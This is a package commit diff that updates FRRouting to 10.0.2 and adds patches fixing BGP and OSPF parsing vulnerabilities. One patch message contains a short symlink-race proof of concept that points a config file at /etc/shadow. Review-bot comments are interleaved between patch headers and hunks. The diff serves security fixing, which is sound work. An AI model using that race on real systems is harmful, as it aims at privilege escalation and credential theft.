From a775fc8d7f701313528ef562543dfb02630825d4f0e2ab0804aafcd7ccf99885 Mon Sep 17 00:00:00 2001 
From: Erico Mendonca Date: Tue, 1 Oct 2024 19:38:40 +0000 Subject: [PATCH] - Update to frr 10.0.2 release providing fix for CVE-2024-44070 and other issues, see https://frrouting.org/release/10.0.2/ - Removed patch included in the sources: [- 0002-bgpd-Check-the-actual-remaining-stream-length-before.patch] OBS-URL: https://build.opensuse.org/package/show/network/frr?expand=0&rev=79 --- .gitattributes | 23 + .gitignore | 1 + 0001-disable-zmq-test.patch | 25 + ...ctual-remaining-stream-length-before.patch | 51 ++ ..._USER-install-chown-commands-to-avoi.patch | 93 ++++ ...e-backslash-from-declare-check-regex.patch | 29 + 0005-root-ok-in-account-frr.pam.patch | 33 ++ ...es-for-Long-lived-Graceful-Restart-c.patch | 48 ++ ...sure-stream-received-has-enough-data.patch | 155 ++++++ ...the-first-byte-of-ORF-header-if-we-a.patch | 29 + ...ess-NLRIs-if-the-attribute-length-is.patch | 100 ++++ ...s-withdraw-for-tunnel-encapsulation-.patch | 131 +++++ ...ld-fix-11808-to-avoid-infinite-loops.patch | 48 ++ ...pec-to-no-attribute-means-a-implicit.patch | 37 ++ ...tory-attributes-more-carefully-for-U.patch | 115 ++++ ...EACH_NLRI-malformed-packets-with-ses.patch | 121 +++++ ...s-withdrawn-to-avoid-unwanted-handli.patch | 109 ++++ ...ling-NLRIs-if-we-received-MP_UNREACH.patch | 90 ++++ ...ond-end-of-stream-of-labeled-unicast.patch | 58 ++ 0018-bgpd-Flowspec-overflow-issue.patch | 37 ++ ...n-receiving-BGP-Prefix-SID-attribute.patch | 121 +++++ ...spfd-Solved-crash-in-OSPF-TE-parsing.patch | 37 ++ ...ved-crash-in-RI-parsing-with-OSPF-TE.patch | 67 +++ ...d-Correct-Opaque-LSA-Extended-parser.patch | 109 ++++ ...rotect-call-to-get_edge-in-ospf_te.c.patch | 82 +++ frr-10.0.1.tar.gz | 3 + frr-10.0.2.tar.gz | 3 + frr-8.4.tar.gz | 3 + frr-tmpfiles.d | 1 + frr.changes | 510 ++++++++++++++++++ frr.spec | 504 +++++++++++++++++ harden_frr.service.patch | 42 ++ 32 files changed, 2815 insertions(+) create mode 100644 .gitattributes create mode 100644 .gitignore create mode 100644 
0001-disable-zmq-test.patch create mode 100644 0002-bgpd-Check-the-actual-remaining-stream-length-before.patch create mode 100644 0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch create mode 100644 0004-tools-remove-backslash-from-declare-check-regex.patch create mode 100644 0005-root-ok-in-account-frr.pam.patch create mode 100644 0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch create mode 100644 0007-bgpd-Ensure-stream-received-has-enough-data.patch create mode 100644 0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch create mode 100644 0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch create mode 100644 0010-bgpd-Use-treat-as-withdraw-for-tunnel-encapsulation-.patch create mode 100644 0011-babeld-fix-11808-to-avoid-infinite-loops.patch create mode 100644 0012-bgpd-Limit-flowspec-to-no-attribute-means-a-implicit.patch create mode 100644 0013-bgpd-Check-mandatory-attributes-more-carefully-for-U.patch create mode 100644 0014-bgpd-Handle-MP_REACH_NLRI-malformed-packets-with-ses.patch create mode 100644 0015-bgpd-Treat-EOR-as-withdrawn-to-avoid-unwanted-handli.patch create mode 100644 0016-bgpd-Ignore-handling-NLRIs-if-we-received-MP_UNREACH.patch create mode 100644 0017-bgpd-Fix-use-beyond-end-of-stream-of-labeled-unicast.patch create mode 100644 0018-bgpd-Flowspec-overflow-issue.patch create mode 100644 0019-bgpd-fix-error-handling-when-receiving-BGP-Prefix-SID-attribute.patch create mode 100644 0020-ospfd-Solved-crash-in-OSPF-TE-parsing.patch create mode 100644 0021-ospfd-Solved-crash-in-RI-parsing-with-OSPF-TE.patch create mode 100644 0022-ospfd-Correct-Opaque-LSA-Extended-parser.patch create mode 100644 0023-ospfd-protect-call-to-get_edge-in-ospf_te.c.patch create mode 100644 frr-10.0.1.tar.gz create mode 100644 frr-10.0.2.tar.gz create mode 100644 frr-8.4.tar.gz create mode 100644 frr-tmpfiles.d create mode 100644 frr.changes create mode 100644 frr.spec create mode 100644 harden_frr.service.patch 
diff --git a/.gitattributes b/.gitattributes
new file mode 100644
index 0000000..9b03811
--- /dev/null
+++ b/.gitattributes
@@ -0,0 +1,23 @@
+## Default LFS
+*.7z filter=lfs diff=lfs merge=lfs -text
+*.bsp filter=lfs diff=lfs merge=lfs -text
+*.bz2 filter=lfs diff=lfs merge=lfs -text
+*.gem filter=lfs diff=lfs merge=lfs -text
+*.gz filter=lfs diff=lfs merge=lfs -text
+*.jar filter=lfs diff=lfs merge=lfs -text
+*.lz filter=lfs diff=lfs merge=lfs -text
+*.lzma filter=lfs diff=lfs merge=lfs -text
+*.obscpio filter=lfs diff=lfs merge=lfs -text
+*.oxt filter=lfs diff=lfs merge=lfs -text
+*.pdf filter=lfs diff=lfs merge=lfs -text
+*.png filter=lfs diff=lfs merge=lfs -text
+*.rpm filter=lfs diff=lfs merge=lfs -text
+*.tbz filter=lfs diff=lfs merge=lfs -text
+*.tbz2 filter=lfs diff=lfs merge=lfs -text
+*.tgz filter=lfs diff=lfs merge=lfs -text
+*.ttf filter=lfs diff=lfs merge=lfs -text
+*.txz filter=lfs diff=lfs merge=lfs -text
+*.whl filter=lfs diff=lfs merge=lfs -text
+*.xz filter=lfs diff=lfs merge=lfs -text
+*.zip filter=lfs diff=lfs merge=lfs -text
+*.zst filter=lfs diff=lfs merge=lfs -text
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..57affb6
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+.osc
diff --git a/0001-disable-zmq-test.patch b/0001-disable-zmq-test.patch
new file mode 100644
index 0000000..8d59a16
--- /dev/null
+++ b/0001-disable-zmq-test.patch
@@ -0,0 +1,25 @@
+From a19581f960db4c5f4f3b759e2d7ecf3e9ac73381 Mon Sep 17 00:00:00 2001
+From: Ruben Torrero Marijnissen
+Date: Mon, 21 Dec 2020 18:36:43 +0000
+Subject: [PATCH] tests: disable zeromq tests due to build service timeouts
+References: bsc#1180217
+---
+ tests/lib/test_zmq.py | 3 +--
+ 1 file changed, 1 insertion(+), 2 deletions(-)
+
+diff --git a/tests/lib/test_zmq.py b/tests/lib/test_zmq.py
+index 1f8ee5416..b298fe7b5 100644
+--- a/tests/lib/test_zmq.py
++++ b/tests/lib/test_zmq.py
+@@ -5,8 +5,7 @@ import os
+ program = "./test_zmq"
+
+ @pytest.mark.skipif(
+- 'S["ZEROMQ_TRUE"]=""\n' not in open("../config.status").readlines(),
+- reason="ZEROMQ not enabled",
++ reason="Test disabled due to intermittent build service timeouts"
+ )
+ def test_refout(self):
+ return super(TestZMQ, self).test_refout()
+--
+2.29.2
diff --git a/0002-bgpd-Check-the-actual-remaining-stream-length-before.patch b/0002-bgpd-Check-the-actual-remaining-stream-length-before.patch
new file mode 100644
index 0000000..edfa30d
--- /dev/null
+++ b/0002-bgpd-Check-the-actual-remaining-stream-length-before.patch
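Review bot: The `@pytest.mark.skipif(` on the new side is left with only `reason=` and no condition, which pytest treats as an unconditional skip, so the decorator reads as a conditional check that never evaluates anything. The plain form states the intent directly: `@pytest.mark.skip(reason="Test disabled due to intermittent build service timeouts")`. The test_refout method and its enclosing class continue outside the hunk.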
@@ -0,0 +1,51 @@ +From 605485a7c470f6e49c3f5712f2c4692fea3019e7 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Wed, 31 Jul 2024 08:35:14 +0300 +Subject: [PATCH] bgpd: Check the actual remaining stream length before taking + TLV value +Upstream: yes +References: CVE-2024-44070,bsc#1229438,gh#FRRouting/frr#16502 + +``` + 0 0xb50b9f898028 in __sanitizer_print_stack_trace (/home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/.libs/bgpd+0x368028) (BuildId: 3292703ed7958b20076550c967f879db8dc27ca7) + 1 0xb50b9f7ed8e4 in fuzzer::PrintStackTrace() (/home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/.libs/bgpd+0x2bd8e4) (BuildId: 3292703ed7958b20076550c967f879db8dc27ca7) + 2 0xb50b9f7d4d9c in fuzzer::Fuzzer::CrashCallback() (/home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/.libs/bgpd+0x2a4d9c) (BuildId: 3292703ed7958b20076550c967f879db8dc27ca7) + 3 0xe0d12d7469cc (linux-vdso.so.1+0x9cc) (BuildId: 1a77697e9d723fe22246cfd7641b140c427b7e11) + 4 0xe0d12c88f1fc in __pthread_kill_implementation nptl/pthread_kill.c:43:17 + 5 0xe0d12c84a678 in gsignal signal/../sysdeps/posix/raise.c:26:13 + 6 0xe0d12c83712c in abort stdlib/abort.c:79:7 + 7 0xe0d12d214724 in _zlog_assert_failed /home/ubuntu/frr-public/frr_public_private-libfuzzer/lib/zlog.c:789:2 + 8 0xe0d12d1285e4 in stream_get /home/ubuntu/frr-public/frr_public_private-libfuzzer/lib/stream.c:324:3 + 9 0xb50b9f8e47c4 in bgp_attr_encap /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_attr.c:2758:3 + 10 0xb50b9f8dcd38 in bgp_attr_parse /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_attr.c:3783:10 + 11 0xb50b9faf74b4 in bgp_update_receive /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_packet.c:2383:20 + 12 0xb50b9faf1dcc in bgp_process_packet /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_packet.c:4075:11 + 13 0xb50b9f8c90d0 in LLVMFuzzerTestOneInput /home/ubuntu/frr-public/frr_public_private-libfuzzer/bgpd/bgp_main.c:582:3 +``` + +Reported-by: 
Iggy Frankovic +Signed-off-by: Donatas Abraitis +(cherry picked from commit 0998b38e4d61179441f90dd7e7fd6a3a8b7bd8c5) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 40e074d058..4ebb45e3de 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -2727,6 +2727,14 @@ static int bgp_attr_encap(struct bgp_attr_parser_args *args) + args->total); + } + ++ if (STREAM_READABLE(BGP_INPUT(peer)) < sublength) { ++ zlog_err("Tunnel Encap attribute sub-tlv length %d exceeds remaining stream length %zu", ++ sublength, STREAM_READABLE(BGP_INPUT(peer))); ++ return bgp_attr_malformed(args, ++ BGP_NOTIFY_UPDATE_OPT_ATTR_ERR, ++ args->total); ++ } ++ + /* alloc and copy sub-tlv */ + /* TBD make sure these are freed when attributes are released */ + tlv = XCALLOC(MTYPE_ENCAP_TLV, +-- +2.43.0 + diff --git a/0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch b/0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch new file mode 100644 index 0000000..7279f97 --- /dev/null +++ b/0003-tools-Run-as-FRR_USER-install-chown-commands-to-avoi.patch 
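Review bot: The description says 0002-bgpd-Check-the-actual-remaining-stream-length-before.patch was removed because 10.0.2 already carries the CVE-2024-44070 fix, yet this hunk creates that file, and the diffstat also lists frr-10.0.1.tar.gz and frr-8.4.tar.gz beside frr-10.0.2.tar.gz. The same question applies to the other `Upstream: yes` patches dated 2022–2023 in this chunk (0006 through 0012): they predate the 10.0 branch, so if frr.spec, which is not in this chunk, still applies them in %prep they are likely already present in the tarball and the patch step would fail or double-apply. If this is an OBS export that snapshots the whole package directory, the stale patch and tarballs should be deleted from the package rather than left unreferenced, so the carried CVE list matches what is actually applied.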
@@ -0,0 +1,93 @@ +From 401053f3ccc7be3a6a976f6f7f1674bdeb3c983e Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis +Date: Thu, 20 Oct 2022 09:10:22 +0300 +References: bsc#1204124,CVE-2022-42917,https://github.com/FRRouting/frr/pull/12157 +Upstream: submitted +Subject: [PATCH] tools: Run as FRR_USER `install/chown` commands to avoid race + conditions + +This is due to CVE-2022-42917: https://bugzilla.suse.com/show_bug.cgi?id=1204124 + +install/chown is in most cases (as I tested) is enough, but still, can be racy. + +Tested on Linux/OpenBSD/NetBSD/FreeBSD, seems a unified way to do this. + +For Linux `runuser` can be used, but *BSD do not have this command. + +Proof of concept: + +``` +% sudo su - frr +[sudo] password for donatas: +su: warning: cannot change directory to /nonexistent: No such file or directory +frr@donatas-laptop:/home/donatas$ cd /etc/frr/ +frr@donatas-laptop:/etc/frr$ rm -f zebra.conf; inotifywait -e CREATE .; rm -f zebra.conf; ln -s /etc/shadow zebra.conf +Setting up watches. +Watches established. +./ CREATE zebra.conf +frr@donatas-laptop:/etc/frr$ ls -la zebra.conf +lrwxrwxrwx 1 frr frr 11 spal. 20 09:25 zebra.conf -> /etc/shadow +frr@donatas-laptop:/etc/frr$ cat zebra.conf +cat: zebra.conf: Permission denied +frr@donatas-laptop:/etc/frr$ +``` + +On the other terminal do: + +``` +/usr/lib/frr/frrinit.sh restart +``` + +Signed-off-by: Donatas Abraitis + +diff --git a/tools/frr.in b/tools/frr.in +index e9f1122834..5f3f425a1e 100755 +--- a/tools/frr.in ++++ b/tools/frr.in +@@ -96,10 +96,10 @@ check_daemon() + # check for config file + if [ -n "$2" ]; then + if [ ! -r "$C_PATH/$1-$2.conf" ]; then +- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" /dev/null "$C_PATH/$1-$2.conf" ++ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" /dev/null \"$C_PATH/$1-$2.conf\"" + fi + elif [ ! 
-r "$C_PATH/$1.conf" ]; then +- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" /dev/null "$C_PATH/$1.conf" ++ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" /dev/null \"$C_PATH/$1.conf\"" + fi + fi + return 0 +@@ -524,7 +524,7 @@ convert_daemon_prios + + if [ ! -d $V_PATH ]; then + echo "Creating $V_PATH" +- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" -d "$V_PATH" ++ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" -d \"$V_PATH\"" + chmod gu+x "${V_PATH}" + fi + +diff --git a/tools/frrcommon.sh.in b/tools/frrcommon.sh.in +index 61f1abb378..4d5d688d57 100755 +--- a/tools/frrcommon.sh.in ++++ b/tools/frrcommon.sh.in +@@ -143,7 +143,7 @@ daemon_prep() { + + cfg="$C_PATH/$daemon${inst:+-$inst}.conf" + if [ ! -r "$cfg" ]; then +- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" /dev/null "$cfg" ++ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" /dev/null \"$cfg\"" + fi + return 0 + } +@@ -161,7 +161,7 @@ daemon_start() { + [ "$MAX_FDS" != "" ] && ulimit -n "$MAX_FDS" > /dev/null 2> /dev/null + daemon_prep "$daemon" "$inst" || return 1 + if test ! -d "$V_PATH"; then +- install -g "$FRR_GROUP" -o "$FRR_USER" -m "$FRR_CONFIG_MODE" -d "$V_PATH" ++ su - "${FRR_USER}" -c "install -g \"$FRR_GROUP\" -o \"$FRR_USER\" -m \"$FRR_CONFIG_MODE\" -d \"$V_PATH\"" + chmod gu+x "${V_PATH}" + fi + +-- +2.35.3 + diff --git a/0004-tools-remove-backslash-from-declare-check-regex.patch b/0004-tools-remove-backslash-from-declare-check-regex.patch new file mode 100644 index 0000000..3ec363d --- /dev/null +++ b/0004-tools-remove-backslash-from-declare-check-regex.patch 
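Review bot: The five new `su - "${FRR_USER}" -c "install ... \"$C_PATH/$1-$2.conf\""` lines in check_daemon(), the V_PATH block after convert_daemon_prios, daemon_prep() and daemon_start() interpolate `$FRR_GROUP`, `$FRR_CONFIG_MODE`, `$C_PATH`, `$1`/`$2` and `$cfg` into a string that a second shell re-parses, so quotes, `$` or backticks in those values are interpreted rather than passed literally, and su's exit status is never checked (each function still ends in `return 0`). Passing the values as positional parameters keeps them opaque, e.g. `su - "$FRR_USER" -c 'install -g "$1" -o "$2" -m "$3" /dev/null "$4"' sh "$FRR_GROUP" "$FRR_USER" "$FRR_CONFIG_MODE" "$cfg"`, assuming the local su forwards trailing arguments to the shell as util-linux su does. Because `su -` runs the account's login shell, the install also silently does nothing if the frr account has a nologin shell, which is worth confirming against the spec's user creation outside this chunk. check_daemon() and the other three functions begin and end outside the hunk.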
@@ -0,0 +1,29 @@
+From 3474b220e036497e6bbe23428645217c275f9f87 Mon Sep 17 00:00:00 2001
+From: Marius Tomaschewski
+Date: Fri, 11 Nov 2022 12:26:04 +0100
+References: https://github.com/FRRouting/frr/pull/12307
+Upstream: submitted
+Subject: [PATCH] tools: remove backslash from declare check regex
+
+The backslash in `grep -q '^declare \-a'` is not needed and
+causes `grep: warning: stray \ before -` warning in grep-3.8.
+---
+ tools/frrcommon.sh.in | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tools/frrcommon.sh.in b/tools/frrcommon.sh.in
+index 61f1abb378..3c16c27c6d 100755
+--- a/tools/frrcommon.sh.in
++++ b/tools/frrcommon.sh.in
+@@ -335,7 +335,7 @@ if [ -z "$FRR_PATHSPACE" ]; then
+ load_old_config "/etc/sysconfig/frr"
+ fi
+
+-if { declare -p watchfrr_options 2>/dev/null || true; } | grep -q '^declare \-a'; then
++if { declare -p watchfrr_options 2>/dev/null || true; } | grep -q '^declare -a'; then
+ log_warning_msg "watchfrr_options contains a bash array value." \
+ "The configured value is intentionally ignored since it is likely wrong." \
+ "Please remove or fix the setting."
+--
+2.35.3
+
diff --git a/0005-root-ok-in-account-frr.pam.patch b/0005-root-ok-in-account-frr.pam.patch
new file mode 100644
index 0000000..a051878
--- /dev/null
+++ b/0005-root-ok-in-account-frr.pam.patch
@@ -0,0 +1,33 @@
+From cb467471b31cd653e758bc3f82fffe7c44654796 Mon Sep 17 00:00:00 2001
+From: Marius Tomaschewski
+Date: Fri, 11 Nov 2022 14:50:12 +0100
+References: https://github.com/FRRouting/frr/pull/12308
+Upstream: submitted
+Subject: [PATCH] pam: declare root as sufficient frr pam account
+
+https://github.com/FRRouting/frr/pull/11465 enabled account verification,
+but the pam config declares rootok as sufficient in authentication only
+and not in account verification, what causes warning in the log:
+
+vtysh[3747]: pam_warn(frr:account): function=[pam_sm_acct_mgmt]
+ flags=0 service=[frr] terminal=[] user=[root]
+ ruser=[] rhost=[]
+---
+ redhat/frr.pam | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/redhat/frr.pam b/redhat/frr.pam
+index 5cef5d9d74..17a62f1999 100644
+--- a/redhat/frr.pam
++++ b/redhat/frr.pam
+@@ -5,6 +5,7 @@
+ # Only allow root (and possibly wheel) to use this because enable access
+ # is unrestricted.
+ auth sufficient pam_rootok.so
++account sufficient pam_rootok.so
+
+ # Uncomment the following line to implicitly trust users in the "wheel" group.
+ #auth sufficient pam_wheel.so trust use_uid
+--
+2.35.3
+
diff --git a/0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch b/0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch
new file mode 100644
index 0000000..92e4394
--- /dev/null
+++ b/0006-bgpd-Check-7-bytes-for-Long-lived-Graceful-Restart-c.patch
@@ -0,0 +1,48 @@
+From d95229c9ba4c8ff99dfc644dd2d1e9e172fe3faf Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis
+Date: Fri, 24 Mar 2023 09:55:23 +0200
+Upstream: yes
+References: bsc#1211248,CVE-2023-31489,https://github.com/FRRouting/frr/pull/13100/commits/b1d33ec293e8e36fbb8766252f3b016d268e31ce
+Subject: [PATCH] bgpd: Check 7 bytes for Long-lived Graceful-Restart
+ capability
+
+It's not 4 bytes, it was assuming the same as Graceful-Restart tuples.
+
+LLGR has more 3 bytes (Long-lived Stale Time).
+
+Signed-off-by: Donatas Abraitis
+Signed-off-by: Marius Tomaschewski
+
+diff --git a/bgpd/bgp_open.c b/bgpd/bgp_open.c
+index d1667fac26..907e75e76b 100644
+--- a/bgpd/bgp_open.c
++++ b/bgpd/bgp_open.c
+@@ -599,12 +599,24 @@ static int bgp_capability_restart(struct peer *peer,
+ static int bgp_capability_llgr(struct peer *peer,
+ struct capability_header *caphdr)
+ {
++/*
++ * +--------------------------------------------------+
++ * | Address Family Identifier (16 bits) |
++ * +--------------------------------------------------+
++ * | Subsequent Address Family Identifier (8 bits) |
++ * +--------------------------------------------------+
++ * | Flags for Address Family (8 bits) |
++ * +--------------------------------------------------+
++ * | Long-lived Stale Time (24 bits) |
++ * +--------------------------------------------------+
++ */
++#define BGP_CAP_LLGR_MIN_PACKET_LEN 7
+ struct stream *s = BGP_INPUT(peer);
+ size_t end = stream_get_getp(s) + caphdr->length;
+
+ SET_FLAG(peer->cap, PEER_CAP_LLGR_RCV);
+
+- while (stream_get_getp(s) + 4 <= end) {
++ while (stream_get_getp(s) + BGP_CAP_LLGR_MIN_PACKET_LEN <= end) {
+ afi_t afi;
+ safi_t safi;
+ iana_afi_t pkt_afi = stream_getw(s);
+--
+2.35.3
+
diff --git a/0007-bgpd-Ensure-stream-received-has-enough-data.patch b/0007-bgpd-Ensure-stream-received-has-enough-data.patch
new file mode 100644
index 0000000..aba1134
--- /dev/null
+++ b/0007-bgpd-Ensure-stream-received-has-enough-data.patch
@@ -0,0 +1,155 @@ +From 6d307ec2f5f5f9827f340a08941e6f78d09d1876 Mon Sep 17 00:00:00 2001 +From: Donald Sharp +Date: Tue, 6 Dec 2022 10:23:11 -0500 +Upstream: yes +References: bsc#1211249,CVE-2023-31490,https://github.com/FRRouting/frr/pull/12454/commits/06431bfa7570f169637ebb5898f0b0cc3b010802 +Subject: [PATCH] bgpd: Ensure stream received has enough data + +BGP_PREFIX_SID_SRV6_L3_SERVICE attributes must not +fully trust the length value specified in the nlri. +Always ensure that the amount of data we need to read +can be fullfilled. + +Reported-by: Iggy Frankovic +Signed-off-by: Donald Sharp +Signed-off-by: Marius Tomaschewski + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index b7d0958bac..c6177a1b93 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -2748,9 +2748,21 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length, + uint8_t sid_type, sid_flags; + char buf[BUFSIZ]; + ++ /* ++ * Check that we actually have at least as much data as ++ * specified by the length field ++ */ ++ if (STREAM_READABLE(peer->curr) < length) { ++ flog_err( ++ EC_BGP_ATTR_LEN, ++ "Prefix SID specifies length %hu, but only %zu bytes remain", ++ length, STREAM_READABLE(peer->curr)); ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, ++ args->total); ++ } ++ + if (type == BGP_PREFIX_SID_LABEL_INDEX) { +- if (STREAM_READABLE(peer->curr) < length +- || length != BGP_PREFIX_SID_LABEL_INDEX_LENGTH) { ++ if (length != BGP_PREFIX_SID_LABEL_INDEX_LENGTH) { + flog_err(EC_BGP_ATTR_LEN, + "Prefix SID label index length is %hu instead of %u", + length, BGP_PREFIX_SID_LABEL_INDEX_LENGTH); +@@ -2772,12 +2784,8 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length, + /* Store label index; subsequently, we'll check on + * address-family */ + attr->label_index = label_index; +- } +- +- /* Placeholder code for the IPv6 SID type */ +- else if (type == BGP_PREFIX_SID_IPV6) { +- if (STREAM_READABLE(peer->curr) < length +- || length != BGP_PREFIX_SID_IPV6_LENGTH) { ++ } else if (type == 
BGP_PREFIX_SID_IPV6) { ++ if (length != BGP_PREFIX_SID_IPV6_LENGTH) { + flog_err(EC_BGP_ATTR_LEN, + "Prefix SID IPv6 length is %hu instead of %u", + length, BGP_PREFIX_SID_IPV6_LENGTH); +@@ -2791,10 +2799,7 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length, + stream_getw(peer->curr); + + stream_get(&ipv6_sid, peer->curr, 16); +- } +- +- /* Placeholder code for the Originator SRGB type */ +- else if (type == BGP_PREFIX_SID_ORIGINATOR_SRGB) { ++ } else if (type == BGP_PREFIX_SID_ORIGINATOR_SRGB) { + /* + * ietf-idr-bgp-prefix-sid-05: + * Length is the total length of the value portion of the +@@ -2819,19 +2824,6 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length, + args->total); + } + +- /* +- * Check that we actually have at least as much data as +- * specified by the length field +- */ +- if (STREAM_READABLE(peer->curr) < length) { +- flog_err(EC_BGP_ATTR_LEN, +- "Prefix SID Originator SRGB specifies length %hu, but only %zu bytes remain", +- length, STREAM_READABLE(peer->curr)); +- return bgp_attr_malformed( +- args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, +- args->total); +- } +- + /* + * Check that the portion of the TLV containing the sequence of + * SRGBs corresponds to a multiple of the SRGB size; to get +@@ -2855,12 +2847,8 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length, + stream_get(&srgb_base, peer->curr, 3); + stream_get(&srgb_range, peer->curr, 3); + } +- } +- +- /* Placeholder code for the VPN-SID Service type */ +- else if (type == BGP_PREFIX_SID_VPN_SID) { +- if (STREAM_READABLE(peer->curr) < length +- || length != BGP_PREFIX_SID_VPN_SID_LENGTH) { ++ } else if (type == BGP_PREFIX_SID_VPN_SID) { ++ if (length != BGP_PREFIX_SID_VPN_SID_LENGTH) { + flog_err(EC_BGP_ATTR_LEN, + "Prefix SID VPN SID length is %hu instead of %u", + length, BGP_PREFIX_SID_VPN_SID_LENGTH); +@@ -2896,39 +2884,22 @@ bgp_attr_psid_sub(uint8_t type, uint16_t length, + attr->srv6_vpn->sid_flags = sid_flags; + sid_copy(&attr->srv6_vpn->sid, &ipv6_sid); + attr->srv6_vpn = 
srv6_vpn_intern(attr->srv6_vpn); +- } +- +- /* Placeholder code for the SRv6 L3 Service type */ +- else if (type == BGP_PREFIX_SID_SRV6_L3_SERVICE) { +- if (STREAM_READABLE(peer->curr) < length) { ++ } else if (type == BGP_PREFIX_SID_SRV6_L3_SERVICE) { ++ if (STREAM_READABLE(peer->curr) < 1) { + flog_err( + EC_BGP_ATTR_LEN, +- "Prefix SID SRv6 L3-Service length is %hu, but only %zu bytes remain", +- length, STREAM_READABLE(peer->curr)); +- return bgp_attr_malformed(args, +- BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, +- args->total); ++ "Prefix SID SRV6 L3 Service not enough data left, it must be at least 1 byte"); ++ return bgp_attr_malformed( ++ args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, ++ args->total); + } +- + /* ignore reserved */ + stream_getc(peer->curr); + + return bgp_attr_srv6_service(args); + } +- + /* Placeholder code for Unsupported TLV */ + else { +- +- if (STREAM_READABLE(peer->curr) < length) { +- flog_err( +- EC_BGP_ATTR_LEN, +- "Prefix SID SRv6 length is %hu - too long, only %zu remaining in this UPDATE", +- length, STREAM_READABLE(peer->curr)); +- return bgp_attr_malformed( +- args, BGP_NOTIFY_UPDATE_ATTR_LENG_ERR, +- args->total); +- } +- + if (bgp_debug_update(peer, NULL, NULL, 1)) + zlog_debug( + "%s attr Prefix-SID sub-type=%u is not supported, skipped", +-- +2.35.3 + diff --git a/0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch b/0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch new file mode 100644 index 0000000..2ba1cfc --- /dev/null +++ b/0008-bgpd-Don-t-read-the-first-byte-of-ORF-header-if-we-a.patch 
@@ -0,0 +1,29 @@
+From a6c5ef48cb086b94a5b911af4ee9f675213fb14b Mon Sep 17 00:00:00 2001
+From: Donatas Abraitis
+Date: Sun, 20 Aug 2023 22:15:27 +0300
+Upstream: yes
+References: CVE-2023-41360,bsc#1214739,https://github.com/FRRouting/frr/pull/14245
+Subject: [PATCH] bgpd: Don't read the first byte of ORF header if we are ahead
+ of stream
+
+Reported-by: Iggy Frankovic iggyfran@amazon.com
+Signed-off-by: Donatas Abraitis
+Signed-off-by: Marius Tomaschewski
+
+diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c
+index 72d6a92317..4947dbc21d 100644
+--- a/bgpd/bgp_packet.c
++++ b/bgpd/bgp_packet.c
+@@ -2375,7 +2375,8 @@ static int bgp_route_refresh_receive(struct peer *peer, bgp_size_t size)
+ * and 7 bytes of ORF Address-filter entry from
+ * the stream
+ */
+- if (*p_pnt & ORF_COMMON_PART_REMOVE_ALL) {
++ if (p_pnt < p_end &&
++ *p_pnt & ORF_COMMON_PART_REMOVE_ALL) {
+ if (bgp_debug_neighbor_events(peer))
+ zlog_debug(
+ "%pBP rcvd Remove-All pfxlist ORF request",
+--
+2.35.3
+
diff --git a/0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch b/0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch
new file mode 100644
index 0000000..bd53710
--- /dev/null
+++ b/0009-bgpd-Do-not-process-NLRIs-if-the-attribute-length-is.patch
